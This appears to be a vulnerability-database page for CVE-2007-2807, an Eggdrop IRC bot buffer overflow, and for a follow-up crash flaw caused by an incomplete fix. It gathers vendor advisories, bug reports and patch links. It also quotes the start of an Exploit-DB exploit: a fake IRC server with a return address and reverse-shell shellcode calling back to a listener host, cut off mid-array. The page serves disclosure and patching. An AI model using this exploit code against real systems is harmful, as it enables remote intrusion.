CVE-2007-2807
published 2007-05-22CVE-2007-2807: Stack-based buffer overflow in mod/server.mod/servrmsg.c in Eggdrop 1.6.18, and possibly earlier, allows user-assisted, remote IRC servers to execute arbitrary…
PriorityP336medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
9.98%
95.0th percentile
Stack-based buffer overflow in mod/server.mod/servrmsg.c in Eggdrop 1.6.18, and possibly earlier, allows user-assisted, remote IRC servers to execute arbitrary code via a long private message.
Affected
63 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | eggdrop | < eggdrop 1.6.18-1.1 (bookworm) | eggdrop 1.6.18-1.1 (bookworm) |
| debian | eggdrop | < eggdrop 1.6.19-1.2 (bookworm) | eggdrop 1.6.19-1.2 (bookworm) |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | — | — |
| eggheads | eggdrop | >= 0 < 1.6.19-1.2 | 1.6.19-1.2 |
| eggheads | eggdrop | >= 0 < 1.6.19-1.2 | 1.6.19-1.2 |
| eggheads | eggdrop | >= 0 < 1.6.19-1.2 | 1.6.19-1.2 |
| eggheads | eggdrop | >= 0 < 1.6.19-1.2 | 1.6.19-1.2 |
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
osv6.8MEDIUM
vendor_debian6.8MEDIUM
vendor_redhat6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
eggdrop DoS (crash)
vendor_redhat·2009-05-26·CVSS 6.8
CVE-2009-1789 [MEDIUM] eggdrop DoS (crash)
eggdrop DoS (crash)
mod/server.mod/servmsg.c in Eggheads Eggdrop and Windrop 1.6.19 and earlier allows remote attackers to cause a denial of service (crash) via a crafted PRIVMSG that causes an empty string to trigger a negative string length copy. NOTE: this issue exists because of an incorrect fix for CVE-2007-2807.
Debian
CVE-2009-1789: eggdrop - mod/server.mod/servmsg.c in Eggheads Eggdrop and Windrop 1.6.19 and earlier allo...
vendor_debian·2009·CVSS 6.8
CVE-2009-1789 [MEDIUM] CVE-2009-1789: eggdrop - mod/server.mod/servmsg.c in Eggheads Eggdrop and Windrop 1.6.19 and earlier allo...
mod/server.mod/servmsg.c in Eggheads Eggdrop and Windrop 1.6.19 and earlier allows remote attackers to cause a denial of service (crash) via a crafted PRIVMSG that causes an empty string to trigger a negative string length copy. NOTE: this issue exists because of an incorrect fix for CVE-2007-2807.
Scope: local
bookworm: resolved (fixed in 1.6.19-1.2)
bullseye: resolved (fixed in 1.6.19-1.2)
forky: resolved (fixed in 1.6.19-1.2)
sid: resolved (fixed in 1.6.19-1.2)
trixie: resolved (fixed in 1.6.19-1.2)
Debian
CVE-2007-2807: eggdrop - Stack-based buffer overflow in mod/server.mod/servrmsg.c in Eggdrop 1.6.18, and ...
vendor_debian·2007·CVSS 6.8
CVE-2007-2807 [MEDIUM] CVE-2007-2807: eggdrop - Stack-based buffer overflow in mod/server.mod/servrmsg.c in Eggdrop 1.6.18, and ...
Stack-based buffer overflow in mod/server.mod/servrmsg.c in Eggdrop 1.6.18, and possibly earlier, allows user-assisted, remote IRC servers to execute arbitrary code via a long private message.
Scope: local
bookworm: resolved (fixed in 1.6.18-1.1)
bullseye: resolved (fixed in 1.6.18-1.1)
forky: resolved (fixed in 1.6.18-1.1)
sid: resolved (fixed in 1.6.18-1.1)
trixie: resolved (fixed in 1.6.18-1.1)
GHSA
GHSA-v2pc-r45v-vq4h: mod/server
ghsa_unreviewed·2022-05-02·CVSS 6.8
CVE-2009-1789 [MEDIUM] GHSA-v2pc-r45v-vq4h: mod/server
mod/server.mod/servmsg.c in Eggheads Eggdrop and Windrop 1.6.19 and earlier allows remote attackers to cause a denial of service (crash) via a crafted PRIVMSG that causes an empty string to trigger a negative string length copy. NOTE: this issue exists because of an incorrect fix for CVE-2007-2807.
GHSA
GHSA-p35w-cvx7-7v49: Stack-based buffer overflow in mod/server
ghsa_unreviewed·2022-05-01
CVE-2007-2807 [MEDIUM] GHSA-p35w-cvx7-7v49: Stack-based buffer overflow in mod/server
Stack-based buffer overflow in mod/server.mod/servrmsg.c in Eggdrop 1.6.18, and possibly earlier, allows user-assisted, remote IRC servers to execute arbitrary code via a long private message.
OSV
CVE-2009-1789: mod/server
osv·2009-05-26·CVSS 6.8
CVE-2009-1789 [MEDIUM] CVE-2009-1789: mod/server
mod/server.mod/servmsg.c in Eggheads Eggdrop and Windrop 1.6.19 and earlier allows remote attackers to cause a denial of service (crash) via a crafted PRIVMSG that causes an empty string to trigger a negative string length copy. NOTE: this issue exists because of an incorrect fix for CVE-2007-2807.
OSV
CVE-2007-2807: Stack-based buffer overflow in mod/server
osv·2007-05-22·CVSS 6.8
CVE-2007-2807 [MEDIUM] CVE-2007-2807: Stack-based buffer overflow in mod/server
Stack-based buffer overflow in mod/server.mod/servrmsg.c in Eggdrop 1.6.18, and possibly earlier, allows user-assisted, remote IRC servers to execute arbitrary code via a long private message.
No detection rules found.
Exploit-DB
Eggdrop/Windrop 1.6.19 - ctcpbuf Remote Crash
exploitdb·2009-05-15·CVSS 6.8
CVE-2009-1789 [MEDIUM] Eggdrop/Windrop 1.6.19 - ctcpbuf Remote Crash
Eggdrop/Windrop 1.6.19 - ctcpbuf Remote Crash
---
eggdrop/windrop remote crash vulnerability
* This message: [ Message body ] [ More options ]
* Related messages: [ Next message ] [ Previous message ] [ Next in thread ] [ Replies ]
From: Thomas Sader
Date: Fri, 15 May 2009 05:54:08 +0200
Affected software
eggdrop (1.6.19 only, not 1.6.19+ctcpfix)
windrop (1.6.19 only, not 1.6.19+ctcpfix)
all eggdrop/windrop versions and packages which apply Nico Goldes
patch for CVE-2007-2807/SA25276 See: [1]
Vulnerability details
The SA25276 patch ([1]) uses strncpy to fix a buffer overflow vulnerability
in src/mod/server.mod/servmsg.c (gotmsg). The last argument is not checked
for being non-negative, but that can happen if ctcpbuf is "". That causes
a remote crash vulnerability to be exploited by
Exploit-DB
Eggdrop Server Module Message Handling - Remote Buffer Overflow
exploitdb·2007-10-10
CVE-2007-2807 Eggdrop Server Module Message Handling - Remote Buffer Overflow
Eggdrop Server Module Message Handling - Remote Buffer Overflow
---
/*
Eggdrop Server Module Message Handling Remote Buffer Overflow Vulnerability
https://www.securityfocus.com/bid/24070
discovered by Bow Sineath
tested on eggdrop 1.6.18 / linux 2.4
-exploit is a fake ircd
replace shellcode.. strip 0x00,0x0a and a few more probably.
remember to add \n at end of shellcode.
poison some dns cache or .jump
play.
-bangus/magnum
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define LISTENPORT 6667
#define BACKLOG 3
#define RETADDR 0xbffff7b9
/*
* linux/x86/shell_reverse_tcp - 99 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* LPORT=4444, LHOST=10.0.0.250
*/
unsigned char shellcode[] =
"\xbf\x1a\x2f\xf0\x55\xdb\xc9\xd9\x74\x24\xf4\x5b\x31\x
Bugzilla
CVE-2009-1789 eggdrop DoS (crash)
bugzilla·2009-05-26·CVSS 6.8
CVE-2009-1789 [MEDIUM] CVE-2009-1789 eggdrop DoS (crash)
CVE-2009-1789 eggdrop DoS (crash)
mod/server.mod/servmsg.c in Eggheads Eggdrop and Windrop 1.6.19 and
earlier allows remote attackers to cause a denial of service (crash)
via a crafted PRIVMSG that causes an empty string to trigger a
negative string length copy. NOTE: this issue exists because of an
incorrect fix for CVE-2007-2807.
http://secunia.com/advisories/35104
Discussion:
Created eggdrop tracking bugs for this issue
CVE-2009-1789 Affects: F10 [bug #502651]
CVE-2009-1789 Affects: F8 [bug #502652]
CVE-2009-1789 Affects: F9 [bug #502653]
CVE-2009-1789 Affects: Fdevel [bug #502654]
---
The upstream fix should be here:
http://cvs.eggheads.org/viewvc/viewvc.cgi/eggdrop1.6/src/mod/server.mod/servmsg.c?r1=1.100&r2=1.101
---
Package: eggdrop-1.6.19-4.fc12 Tag: dist-f12 Status: compl
Bugzilla
Eggdrop: Incomplete fix for CVE-2007-2807
bugzilla·2009-05-15·CVSS 6.8
CVE-2007-2807 [MEDIUM] Eggdrop: Incomplete fix for CVE-2007-2807
Eggdrop: Incomplete fix for CVE-2007-2807
A stack-based buffer overflow in mod/server.mod/servrmsg.c, which might allow user-assisted, remote IRC servers to execute arbitrary code via a long private message, was originally found in Eggdrop 1.6.18, and possibly earlier versions (CVE-2007-2807).Thomas Sader reported, the original fix, fixing the issue
was incomplete (introduced another flaw).
References:
http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/68341
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=528778
Upstream report:
http://www.eggheads.org/downloads/
Proposed patch (against latest Eggdrop version):
http://www.eggheads.org/redirect.php?url=ftp://ftp.eggheads.org/pub/eggdrop/patches/official/1.6/eggdrop1.6.19%2Bctcpfix.patch.gz
Discussion:
*** This bug has bee
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=427157http://osvdb.org/36237http://secunia.com/advisories/25276http://secunia.com/advisories/26727http://secunia.com/advisories/26826http://secunia.com/advisories/27989http://secunia.com/advisories/28347http://secunia.com/advisories/35690http://security.gentoo.org/glsa/glsa-200709-07.xmlhttp://securitytracker.com/id?1018700http://www.debian.org/security/2008/dsa-1448http://www.debian.org/security/2009/dsa-1826http://www.eggheads.org/bugzilla/show_bug.cgi?id=462http://www.mandriva.com/security/advisories?name=MDKSA-2007:175http://www.securityfocus.com/bid/24070https://www.redhat.com/archives/fedora-package-announce/2007-December/msg00336.htmlhttps://www.redhat.com/archives/fedora-package-announce/2007-December/msg00348.htmlhttp://bugs.debian.org/cgi-bin/bugreport.cgi?bug=427157http://osvdb.org/36237http://secunia.com/advisories/25276http://secunia.com/advisories/26727http://secunia.com/advisories/26826http://secunia.com/advisories/27989http://secunia.com/advisories/28347http://secunia.com/advisories/35690http://security.gentoo.org/glsa/glsa-200709-07.xmlhttp://securitytracker.com/id?1018700http://www.debian.org/security/2008/dsa-1448http://www.debian.org/security/2009/dsa-1826http://www.eggheads.org/bugzilla/show_bug.cgi?id=462http://www.mandriva.com/security/advisories?name=MDKSA-2007:175http://www.securityfocus.com/bid/24070https://www.redhat.com/archives/fedora-package-announce/2007-December/msg00336.htmlhttps://www.redhat.com/archives/fedora-package-announce/2007-December/msg00348.html
2007-05-22
Published